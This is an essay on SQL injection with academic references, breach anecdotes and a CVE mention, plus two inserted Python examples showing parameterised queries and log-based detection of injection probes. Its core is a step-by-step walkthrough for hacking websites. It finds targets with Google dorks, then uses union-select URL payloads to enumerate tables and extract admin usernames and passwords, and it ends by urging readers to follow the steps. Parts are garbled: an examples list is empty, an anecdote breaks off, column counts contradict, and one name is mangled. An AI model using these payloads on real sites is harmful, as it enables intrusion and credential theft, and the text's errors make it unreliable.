Discuss SQL Injection and how it operates in the real world.
A SQL Injection attack takes place when an attacker executes harmful SQL code, usually known as a malicious payload (Pawar, 2015). SQL Injection helps the attacker control the database server of a web application, known as an RDBMS (Relational Database Management System). The vulnerability generally affects web applications or websites that make use of a SQL-based database. SQL Injection is one of the oldest methods, and is considered one of the most dangerous attacks in the history of web application vulnerabilities (Agrawal & Singh, 2017). With an advanced SQL Injection vulnerability, and under the right circumstances, the main motive of the attacker is to bypass the authentication and authorization mechanisms of the web application and then retrieve the whole content of the database.
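The mechanism described above, shown from the defender's side as an added example (not code from the cited papers): the same lookup written with string concatenation and with input validation plus a bound parameter. The table names, sample rows and function names are assumptions constructed for the illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data: one public table, one that must stay private.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT);
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO products VALUES (2, 'Samsung TV');
        INSERT INTO admin VALUES ('root', 'constructed-secret');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # Vulnerable: the request value is pasted into the SQL text, so any SQL
    # keywords it carries are parsed and executed by the database.
    return db.execute("SELECT id, name FROM products WHERE id = " + raw_id).fetchall()

def lookup_safe(db, raw_id):
    # Hardened: reject anything that is not a short decimal integer, then
    # bind the value as a parameter so it can only ever be data.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a non-negative integer")
    return db.execute("SELECT id, name FROM products WHERE id = ?", (int(raw_id),)).fetchall()

def lookup_bound_only(db, raw_id):
    # Binding alone, without validation: the whole value is compared as one
    # string and matches no row.
    return db.execute("SELECT id, name FROM products WHERE id = ?", (raw_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    crafted = "-2 union select username, password from admin"  # constructed input
    print(lookup_vulnerable(db, crafted))   # private row leaks
    print(lookup_bound_only(db, crafted))   # no rows
    print(lookup_safe(db, "2"))             # normal request still works
```

Validation and parameter binding are independent layers: binding alone already stops the value from being parsed as SQL, and the validation rejects the request before it reaches the database.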
Figure 1: Flowchart for a SQL Injection Attack
The first step is to find a vulnerable website. The Google Dork list is a tool widely used by hackers to find vulnerable websites (Pawar, 2015). There are various tricks to find the list, but the “inurl:” command is a very popular way to find it.
Some Examples:
The trick is to copy one of the above commands into the search bar and search for the result. The results include a lot of websites that have vulnerabilities in terms of design and security.
Once a vulnerable website is chosen from the list, the next step is to check for and find the vulnerability itself, which can be done by including a single quote at the end of the URL of the website, like:
https://www.abcd.com/index.php?id=2’
If the website remains on the same page or shows an error message such as page not found, then the website is not vulnerable (Agrawal & Singh, 2017).
The number of columns in the database can be checked by adding the “order by n” statement at the end of the URL in place of the single quote. If the value of n exceeds the actual number of columns, an error message will be shown, like (Geneiatakis, 2015):
“https://www.abcd.com/index.php?id=2 order by 8(error)”
The number of columns is one less than the value for which the error message is shown. In this example the number of columns is 7.
If the above method does not work, the alternative method is to add “-” at the end of the URL, for example:
“https://www.abcd.com/index.php?id=2 order by 1- -”
With the help of the “union select columns sequence”, the vulnerable part of the table can be found. The “order by n” command must be replaced with this statement. The command for 8 columns is as follows:
https://www.abcd.com/index.php?id=-2 union select 1,2,3,4,5,6,7,8- -
https://www.abcd.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7,8- -
The result will show some numbers on the search page, like 1, 2, 3, 4, 5, and one of these numbers has to be chosen; in this case number 2 is chosen for the example. The number is necessary to proceed further with the method (Alwan & Younis, 2017).
Now the number 2 has to be replaced with the command “version()”, like the following:
https://www.abcd.com/index.php?id=-2 and 1=2 union select 1,version(),3,4,5,6,7- -
A version number such as 4.0.2 or 5.3 will be shown.
Now the version() command needs to be replaced with “database()” and “user()” to find information about the database and user respectively like:
“https://www.abcd.com/index.php?id=-2 and 1=2 union select 1,database(),4,5,6,7- -”
“https://www.abcd.com/index.php?id=-2 and 1=2 union select 1,user(),3,4,5,6,7- -”
In order to find the table name, the number chosen in step 4 needs to be replaced with the command “group_concat(table_name)”, and “from information_schema.tables where table_schema=database()” needs to be added (Som, Sinha & Kataria, 2016):
“https://www.abcd.com/index.php?id=-2 and 1=2 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()- -”
It will show a lot of table names, and from those the table related to the admin or user needs to be selected.
Now “group_concat(table_name)” has to be replaced with the “group_concat(column_name)” command. It will show the list of columns, like “admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password”.
Now the “group_concat(column_name)” command should be replaced with the command “group_concat(columnname,0x3a,anothercolumnname)”. “columnname” needs to be replaced with a column name from the list above, and “anothercolumnname” should likewise be replaced with a column name from the list:
With the help of this method the user name and password can be found as well. In order to obtain them, the username and password column names need to be used.
In order to hack a website and obtain information about the database, these steps need to be followed properly and have to be performed in the sequence mentioned.
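The probe sequence above leaves a recognisable trail in web server access logs. The following added example (not part of the original essay) classifies each logged request by the stage it matches and flags clients that progress through several stages; the log lines, IP addresses and function names are constructed for the illustration, and the common access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Most specific stage first; patterns mirror the probe sequence in the text.
STAGES = [
    ("schema_enumeration", re.compile(r"information_schema|group_concat\s*\(", re.I)),
    ("fingerprinting", re.compile(r"\b(?:version|database|user)\s*\(\s*\)", re.I)),
    ("union_probe", re.compile(r"\bunion\b.+\bselect\b", re.I)),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("quote_probe", re.compile(r"'\s*$")),
]
# Common access-log prefix: client, timestamp, request line, status code.
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2018:10:00:01 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 312
203.0.113.7 - - [10/Apr/2018:10:00:09 +0000] "GET /index.php?id=2+order+by+8 HTTP/1.1" 500 312
203.0.113.7 - - [10/Apr/2018:10:00:20 +0000] "GET /index.php?id=-2+union+select+1,2,3,4,5,6,7 HTTP/1.1" 200 2048
203.0.113.7 - - [10/Apr/2018:10:00:31 +0000] "GET /index.php?id=-2+union+select+1,version(),3,4,5,6,7 HTTP/1.1" 200 2048
198.51.100.4 - - [10/Apr/2018:10:01:00 +0000] "GET /index.php?id=2 HTTP/1.1" 200 2048
198.51.100.4 - - [10/Apr/2018:10:01:05 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 1024
""".splitlines()

def classify(request_target):
    """Return the most specific stage the decoded query string matches, or None."""
    query = unquote_plus(urlsplit(request_target).query)
    for stage, pattern in STAGES:
        if pattern.search(query):
            return stage
    return None

def flag_clients(log_lines, min_stages=2):
    """Map client IP -> distinct stages in order seen, for clients at or above the threshold."""
    seen = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        stage = classify(m.group(2))
        if stage and stage not in seen.setdefault(m.group(1), []):
            seen[m.group(1)].append(stage)
    return {ip: stages for ip, stages in seen.items() if len(stages) >= min_stages}

if __name__ == "__main__":
    for ip, stages in flag_clients(SAMPLE_LOG).items():
        print(ip, " -> ".join(stages))
```

Requiring more than one distinct stage per client keeps a single stray quote or a search for the words "order by" from raising an alert on its own.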
Fig2: Work flow diagram of SQL injection to database
Consider the example of an e-commerce search form. A user can ask the site to return a list of the Samsung TVs that were sold at some particular price (Geneiatakis, 2015). A second attack using SQL Injection occurred in 2011. The SQL attack came with the hack of the security firm HB Gary Federal and allowed the Anonymous members to steal the passwords of the company (Sonoda, Matsuda & Koizumi, 2016). A third SQL Injection attack occurred at a Chinese toy company known as VTE. The data of almost 4.8 million parents, including 200,000 children’s data, were stolen from the database of the company. The method that was used to hack the data of VTE was similar to the hacking method that Albert Gonzalez used against Hannaford Brothers, 7-Eleven and many others to steal the credit card numbers and the debit card numbers of the users (Pawar, 2015).
Another attack that took place with SQL Injection was at Mossack Fonseca, the Panamanian law firm. This company was the source of the Panama Projects, whose papers were leaked through an SQL Injection vulnerability in the company (Geneiatakis, 2015).
Figure 2: Industries that are Targeted by SQL Injections
(Source: Geneiatakis, 2015)
The above figure shows the different kinds of industries affected by SQL Injection attacks. It can be observed that financial organizations are the most affected by this attack.
The selected CVE for this paper is CVE-2010-2672 (CVE -CVE-2010-2672, 2018). This CVE covers multiple SQL injection vulnerabilities, which allow remote attackers to execute arbitrary SQL commands via the (1) SectionID and (2) SearchTimestamp parameters to the search feature and the (3) SearchContentClassAttributeID parameter to the advancedsearch feature (Naderi-Afooshteh et al., 2015). The real-life example of a SQL injection attack using this CVE was Sebastian, which is a service provider for phone, TV, and Internet in California.
References
Agrawal, S., & Singh, U. (2017). Prevention of sql injection attack in web application with host language.
Alwan, Z. S., & Younis, M. F. (2017). Detection and Prevention of SQL Injection Attack: A Survey.
CVE -CVE-2010-2672. (2018). Cve.mitre.org. Retrieved 10 April 2018, from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2672
Geneiatakis, D. (2015, December). Minimizing databases attack surface against SQL injection attacks. In International Conference on Information and Communications Security (pp. 1-9). Springer, Cham.
Hilbrich, M., Frank, M., & Lehrig, S. (2016). Security Modeling with Palladio—Different Approaches. In Proceedings of the Symposium on Software Performance (pp. 7-9).
Hochreiner, C., Ma, Z., Kieseberg, P., Schrittwieser, S., & Weippl, E. (2014, April). Using model driven security approaches in web application development. In Information and Communication Technology-EurAsia Conference (pp. 419-431). Springer, Berlin, Heidelberg.
Naderi-Afooshteh, A., Nguyen-Tuong, A., Bagheri-Marzijarani, M., Hiser, J. D., & Davidson, J. W. (2015, June). Joza: Hybrid taint inference for defeating web application sql injection attacks. In Dependable Systems and Networks (DSN), 2015 45th Annual IEEE/IFIP International Conference on (pp. 172-183). IEEE.
Pawar, R. G. (2015). SQL Injection Attacks. KHOJ: Journal of Indian Management Research and Practices, 125-129.
Som, S., Sinha, S., & Kataria, R. (2016). Study on sql injection attacks: Mode detection and prevention. International Journal of Engineering Applied Sciences and Technology, 1(8), 23-29.
Sonoda, M., Matsuda, T., & Koizumi, D. (2016, October). On the approximate maximum likelihood estimation in stochastic model of SQL injection attacks. In Systems, Man, and Cybernetics (SMC), 2016 IEEE International Conference on (pp. 000802-000807). IEEE.
Steimle, F., Wieland, M., Mitschang, B., Wagner, S., & Leymann, F. (2015). Design and implementation issues of a secure cloud-based health data management system. In Proceedings of the 9th Symposium and Summer School On Service-Oriented Computing. Technical Paper, vol. RC25564 (pp. 68-82).